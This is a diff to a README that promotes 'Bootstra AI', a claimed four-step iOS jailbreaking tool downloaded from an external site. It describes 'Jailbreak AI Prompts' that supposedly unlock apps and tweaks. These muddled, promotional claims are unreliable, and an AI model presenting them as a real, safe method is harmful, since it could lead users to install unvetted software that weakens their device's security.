BootstraAI/bootstra-ai/README.md

 ## How to Jailbreak iOS Using Bootstra AI
 Bootstra AI simplifies the jailbreaking process into four straightforward steps:

-1. **[Download and Install Bootstra AI Jailbreaking Tool](https://iospack.com/apps/bootstra-ai/):** Users begin by downloading and installing the Bootstra AI Jailbreaking Tool on their iOS devices.
+1. **[Download and Install Bootstra AI Jailbreaking Tool](https://iospack.com/apps/bootstra-ai/):** Start by downloading the Bootstra AI Jailbreaking Tool onto your iOS device.
 2. **Follow the On-Screen Guide:** Within the application, users are guided through the jailbreaking process via an intuitive on-screen guide designed for simplicity and ease of use.
 3. **Explore Bootstra AI Prompts:** Upon completion of the jailbreaking process, users gain access to a diverse collection of Bootstra AI Prompts tailored for iOS versions 16 through 17.4 Beta 4.
 4. **Add Jailbreak AI Prompts:** Users can easily add Jailbreak AI Prompts to their devices, unlocking popular third-party apps, tweaks, themes, and other enhancements to personalize their iOS experience.